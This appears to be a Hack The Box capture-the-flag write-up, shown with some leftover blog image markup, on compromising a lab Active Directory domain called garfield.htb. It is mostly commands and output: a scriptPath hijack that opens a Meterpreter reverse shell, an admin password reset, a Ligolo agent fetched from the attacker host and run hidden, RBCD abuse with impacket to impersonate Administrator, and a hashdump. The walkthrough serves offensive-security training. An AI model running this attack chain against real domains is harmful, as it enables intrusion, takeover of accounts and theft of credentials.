srcset="https://substackcdn.com/image/fetch/$s_!p96m!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F493a0a58-a420-4e93-9fc6-3f5dd2a3ebb4_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!p96m!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F493a0a58-a420-4e93-9fc6-3f5dd2a3ebb4_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!p96m!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F493a0a58-a420-4e93-9fc6-3f5dd2a3ebb4_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!p96m!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F493a0a58-a420-4e93-9fc6-3f5dd2a3ebb4_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>There&#8217;s nothing when being RODC01 Admin groups parts, but maybe that&#8217;s for later.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ylWa!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c288830-7f14-463e-980b-85aec73b2c97_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ylWa!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c288830-7f14-463e-980b-85aec73b2c97_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!ylWa!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c288830-7f14-463e-980b-85aec73b2c97_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!ylWa!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c288830-7f14-463e-980b-85aec73b2c97_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!ylWa!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c288830-7f14-463e-980b-85aec73b2c97_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ylWa!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c288830-7f14-463e-980b-85aec73b2c97_1590x965.png" width="1590" height="965" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5c288830-7f14-463e-980b-85aec73b2c97_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:965,&quot;width&quot;:1590,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:142555,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193328954?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7497c584-114a-4384-b4ec-8050e3e148cd_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ylWa!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c288830-7f14-463e-980b-85aec73b2c97_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!ylWa!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c288830-7f14-463e-980b-85aec73b2c97_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!ylWa!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c288830-7f14-463e-980b-85aec73b2c97_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!ylWa!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c288830-7f14-463e-980b-85aec73b2c97_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>What I&#8217;ve would say this is going to be:</p><ul><li><p>bloodyAD</p></li><li><p>impacket</p></li></ul><p>Let&#8217;s continue with the simple SMB hijack first.</p><ol start="5"><li><p><em>Initial Access and Internal Password Reset</em></p></li></ol><p>With all the attack-paths plan, now let&#8217;s triggers it:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" bloodyAD --host DC01.garfield.htb -u j.arbuckle -p 'Th1sD4mnC4t!@1978' --dc-ip 10.129.195.37 set object "CN=LIZ WILSON,CN=USERS,DC=GARFIELD,DC=HTB" scriptPath -v attack.bat
[+] CN=LIZ WILSON,CN=USERS,DC=GARFIELD,DC=HTB's scriptPath has been updated</code></pre></div><p>And we should&#8217;ve get our shell!!:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">. . .[SNIP]. . .
[*] Sending stage (232006 bytes) to 10.129.195.37
[*] Meterpreter session 1 opened (10.10.14.30:9001 -&gt; 10.129.195.37:56804) at 2026-04-06 01:40:05 -0400

meterpreter &gt; getuid
Server username: GARFIELD\l.wilson
meterpreter &gt; getprivs

Enabled Process Privileges
==========================

Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeMachineAccountPrivilege

meterpreter &gt;</code></pre></div><p>Note:</p><ul><li><p>We&#8217;re still L.Wilson</p></li><li><p>Needs to change password of L.Wilson_adm for higher access</p></li></ul><p>Before password reset I did bit of enumeration and discover that it&#8217;s have another IP address which is potential another machine or nested.</p><p>Scary part of Dual Admin.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">C:\Windows\system32&gt;whoami
whoami
garfield\l.wilson

C:\Windows\system32&gt;hostname
hostname
DC01

C:\Windows\system32&gt;ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter vEthernet (Switch01):

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::c4ff:5747:1d3c:fba0%9
   IPv4 Address. . . . . . . . . . . : 192.168.100.1
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 

Ethernet adapter Ethernet0 3:

   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::3410:f33a:57f:c20a
   Link-local IPv6 Address . . . . . : fe80::31c6:5a3a:68fd:de86%7
   IPv4 Address. . . . . . . . . . . : 10.129.195.37
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:fe95:16b%7
                                       10.129.0.1

C:\Windows\system32&gt;</code></pre></div><p>Now let&#8217;s do the password reset first:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">PS C:\ProgramData&gt; $passwd = ConvertTo-SecureString passw0rd1 -AsPlainText -Force
$passwd = ConvertTo-SecureString passw0rd1 -AsPlainText -Force

PS C:\ProgramData&gt; Set-ADAccountPassword -Identity l.wilson_adm -NewPassword $passwd -Reset
Set-ADAccountPassword -Identity l.wilson_adm -NewPassword $passwd -Reset</code></pre></div><p>So now we have L.Wilson_ADM pair as logon:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">user: l.wilson_adm
passwd: passw0rd1</code></pre></div><p>And we can now logon as WinRM:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" netexec ldap DC01.garfield.htb -u 'l.wilson_adm' -p passw0rd1         
LDAP        10.129.195.37   389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:garfield.htb) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.195.37   389    DC01             [+] garfield.htb\l.wilson_adm:passw0rd1 
                                                                                                                                                                                                   
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" netexec winrm DC01.garfield.htb -u 'l.wilson_adm' -p passw0rd1
WINRM       10.129.195.37   5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:garfield.htb) 
WINRM       10.129.195.37   5985   DC01             [+] garfield.htb\l.wilson_adm:passw0rd1 (Pwn3d!)</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">*Evil-WinRM* PS C:\programdata&gt; whoami /all

USER INFORMATION
----------------

User Name             SID
===================== =============================================
garfield\l.wilson_adm S-1-5-21-2502726253-3859040611-225969357-3107


GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                           Attributes
=========================================== ================ ============================================= ==================================================
Everyone                                    Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users                Alias            S-1-5-32-555                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
GARFIELD\Tier 1                             Group            S-1-5-21-2502726253-3859040611-225969357-3108 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.</code></pre></div><p>But there&#8217;s nobody in the RODC01 groups:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">*Evil-WinRM* PS C:\programdata&gt; net group "RODC administrators" /domain
Group name     RODC Administrators
Comment

Members

-------------------------------------------------------------------------------
The command completed successfully.

*Evil-WinRM* PS C:\programdata&gt; ipconfig

Windows IP Configuration


Ethernet adapter vEthernet (Switch01):

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::c4ff:5747:1d3c:fba0%9
   IPv4 Address. . . . . . . . . . . : 192.168.100.1
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :

Ethernet adapter Ethernet0 3:

   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::3410:f33a:57f:c20a
   Link-local IPv6 Address . . . . . : fe80::31c6:5a3a:68fd:de86%7
   IPv4 Address. . . . . . . . . . . : 10.129.195.37
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:fe95:16b%7
                                       10.129.0.1
*Evil-WinRM* PS C:\programdata&gt;</code></pre></div><ol start="6"><li><p><em>Internal Enumeration</em></p></li></ol><p>For enumeration of the IP Address and port discover, I create this PowerShell script nammed:</p><ul><li><p><a href="https://gist.github.com/byt3n33dl3/909f6645f9f070f1623769e52a208908">PsNmap.ps1</a></p></li></ul><p>Moreover this is the result:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">*Evil-WinRM* PS C:\programdata&gt; .\PsNmap.ps1 192.168.100.0/24
[+] 192.168.100.1
    Hostname: DC01.garfield.htb
    IPv6: fe80::31c6:5a3a:68fd:de86%7, fe80::c4ff:5747:1d3c:fba0%9, dead:beef::3410:f33a:57f:c20a
    Open Ports: 53, 88, 135, 139, 389, 445, 464, 636, 2179, 3389, 5985

[+] 192.168.100.2
    Hostname: RODC01.garfield.htb
    IPv6: N/A
    Open Ports: 53, 88, 135, 139, 389, 445, 464, 636, 3389, 5985

^C</code></pre></div><p>So moreover this is my local now:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">192.168.100.1  DC01 DC01.garfield.htb garfield.htb
192.168.100.2  RODC01.garfield.htb RODC01 garfield.htb</code></pre></div><ol start="7"><li><p><em>Tunneling with Ligolo-NG</em></p></li></ol><p>So now we tunnel with Ligolo, for the binary I use NetExec for download:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" netexec winrm DC01.garfield.htb -u 'l.wilson_adm' -p passw0rd1 -X "iwr -uri http://10.10.14.30/ela.exe -outfile C:\programdata\ela.exe"
WINRM       10.129.195.37   5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:garfield.htb) 
WINRM       10.129.195.37   5985   DC01             [+] garfield.htb\l.wilson_adm:passw0rd1 (Pwn3d!)
WINRM       10.129.195.37   5985   DC01             [+] Executed command (shell type: powershell)</code></pre></div><p>Let&#8217;s set-up:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo ligolo-proxy -selfcert -api-laddr 0.0.0.0:8081  
INFO[0000] Loading configuration file ligolo-ng.yaml    
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC! 
INFO[0000] Listening on 0.0.0.0:11601                   
INFO[0000] Starting Ligolo-ng Web, API URL is set to: http://0.0.0.0:8081 
WARN[0000] Ligolo-ng API is experimental, and should be running behind a reverse-proxy if publicly exposed. 
    __    _             __                       
   / /   (_)___ _____  / /___        ____  ____ _                                                                                                                                                  
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/                                                                                                                                                  
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /                                                                                                                                                   
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /                                                                                                                                                    
        /____/                          /____/                                                                                                                                                     
                                                                                                                                                                                                   
  Made in France &#9829;            by @Nicocha30!                                                                                                                                                       
  Version: dev                                                                                                                                                                                     
                                                                                                                                                                                                   
ligolo-ng &#187; ifcreate --name ligolo
INFO[0017] Creating a new ligolo interface...           
INFO[0017] Interface created!                           
ligolo-ng &#187; route_add --name ligolo --route 192.168.100.0/24
INFO[0050] Route created.</code></pre></div><p>Then we will run the ligolo binary.</p><p>PS: If you feel the WinRM over HTTP a-bit funny, use <a href="https://github.com/byt3n33dl3/winrmrelayx/">winrmrelayx from my GitHub</a> for better Kerberos stuff related.</p><ul><li><p><a href="https://github.com/byt3n33dl3/winrmrelayx/">github.com/byt3n33dl3/winrmrelayx/</a></p></li></ul><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(venv)&#9472;(root&#12927;kali)-[/]
&#9492;&#9472;# python3 evil_winrmrelayx.py 'l.wilson_adm':passw0rd1@DC01 -target-ip 10.129.195.37
[*] '-port' not specified, using 5985
[*] '-url' not specified, using http://10.129.195.37:5985/wsman

Ctrl+D to exit, Ctrl+C will try to interrupt the running pipeline gracefully
This is not an interactive shell! If you need to run programs that expect
. . .[SNIP]. . .
-a----         4/6/2026   7:46 AM        7302656 ela.exe                                                                
-a----         4/6/2026   7:35 AM           3583 PsNmap.ps1                                                             


PS C:\programdata&gt; Start-Process -FilePath ".\ela.exe" -ArgumentList "-connect 10.10.14.30:11601 -ignore-cert" -WindowStyle Hidden</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">ligolo-ng &#187; INFO[1131] Agent joined.                                 id=00155d0bdd00 name="GARFIELD\\l.wilson_adm@DC01" remote="10.129.195.37:57996"
ligolo-ng &#187; 
ligolo-ng &#187; session
? Specify a session : 1 - GARFIELD\l.wilson_adm@DC01 - 10.129.195.37:57996 - 00155d0bdd00
[Agent : GARFIELD\l.wilson_adm@DC01] &#187; start
INFO[1260] Starting tunnel to GARFIELD\l.wilson_adm@DC01 (00155d0bdd00) 
[Agent : GARFIELD\l.wilson_adm@DC01] &#187;</code></pre></div><p>Done! should&#8217;ve been established by now. Supposed now we&#8217;re more comfortable with interacting with RODC01 domain machine.</p><ol start="8"><li><p><em>RODC Abuse and RBCD Attack to RODC01</em></p></li></ol><p>First we make our-self to RODC Administrator Group with bloodyAD:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" bloodyAD --host DC01.garfield.htb -u 'l.wilson_adm' -p passw0rd1 add groupMember "RODC Administrators" 'l.wilson_adm'
[+] l.wilson_adm added to RODC Administrators</code></pre></div><p>Internal:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">PS C:\programdata&gt; net group "RODC Administrators" /domain
Group name     RODC Administrators
Comment        

Members

-------------------------------------------------------------------------------
l.wilson_adm             
The command completed successfully.

PS C:\programdata&gt; net group "RODC Administrators" /domain
Group name     RODC Administrators
Comment        

Members

-------------------------------------------------------------------------------
l.wilson_adm             
The command completed successfully.</code></pre></div><p>L.Wilson_ADM is now on RODC Admin group.</p><p>Now we will convert Delegation control into exec, via abusing the Computer object.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" bloodyAD --host DC01.garfield.htb -u 'l.wilson_adm' -p passw0rd1 get object DC=garfield,DC=htb --attr ms-DS-MachineAccountQuota

distinguishedName: DC=garfield,DC=htb
ms-DS-MachineAccountQuota: 10</code></pre></div><p>Let&#8217;s make DC02 computer:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" bloodyAD --host DC01.garfield.htb -d garfield.htb -u 'l.wilson_adm' -p passw0rd1 --dc-ip 10.129.195.37 add computer DC02 passw0rd2
[+] DC02 created</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" bloodyAD --host DC01.garfield.htb -d garfield.htb -u 'l.wilson_adm' -p passw0rd1 --dc-ip 10.129.195.37 add rbcd 'RODC01$' 'DC02$' 
[!] No security descriptor has been returned, a new one will be created
[+] DC02$ can now impersonate users on RODC01$ via S4U2Proxy</code></pre></div><p>Supposed now we can request ST FKA service ticket:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" impacket-getST GARFIELD.HTB/'DC02$':passw0rd2 -spn cifs/RODC01.garfield.htb -impersonate Administrator -dc-ip 10.129.195.37
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_RODC01.garfield.htb@GARFIELD.HTB.ccache</code></pre></div><p>Now we have ticket as RODC01:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ export KRB5CCNAME=Administrator@cifs_RODC01.garfield.htb@GARFIELD.HTB.ccache 
                                                                                                                                                                                                   
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ klist
Ticket cache: FILE:Administrator@cifs_RODC01.garfield.htb@GARFIELD.HTB.ccache
Default principal: Administrator@GARFIELD.HTB

Valid starting       Expires              Service principal
04/06/2026 11:15:55  04/06/2026 21:15:54  cifs/RODC01.garfield.htb@GARFIELD.HTB
        renew until 04/07/2026 11:15:52</code></pre></div><p>And we can logon as Admin on RODC01:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo faketime "$(ntpdate -q RODC01 | cut -d ' ' -f 1,2)" netexec smb RODC01 -u Administrator --use-kcache      
SMB         RODC01          445    RODC01           [*] Windows 10 / Server 2019 Build 17763 x64 (name:RODC01) (domain:garfield.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         RODC01          445    RODC01           [+] GARFIELD.HTB\Administrator from ccache (Pwn3d!)</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo faketime "$(ntpdate -q RODC01 | cut -d ' ' -f 1,2)" impacket-wmiexec -k -no-pass GARFIELD.HTB/Administrator@RODC01.garfield.htb
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\&gt;whoami
garfield\administrator

C:\&gt;hostname
RODC01</code></pre></div><p>I also install an executable binary from MSFVenom and chain this second DC with our C2 and drop the NTLM hash:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">meterpreter &gt; bg
[*] Backgrounding session 1...
msf exploit(multi/handler) &gt; sessions

Active sessions
===============

  Id  Name  Type                     Information               Connection
  --  ----  ----                     -----------               ----------
  1         meterpreter x64/windows  GARFIELD\l.wilson @ DC01  10.10.14.30:9001 -&gt; 10.129.195.37:56804 (10.129.195.37)

msf exploit(multi/handler) &gt; exploit
[*] Started reverse TCP handler on 10.10.14.30:9001 
[*] Sending stage (232006 bytes) to 10.129.195.37
[*] Meterpreter session 2 opened (10.10.14.30:9001 -&gt; 10.129.195.37:49839) at 2026-04-06 03:30:01 -0400

meterpreter &gt; getuid
Server username: GARFIELD\Administrator
meterpreter &gt; hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
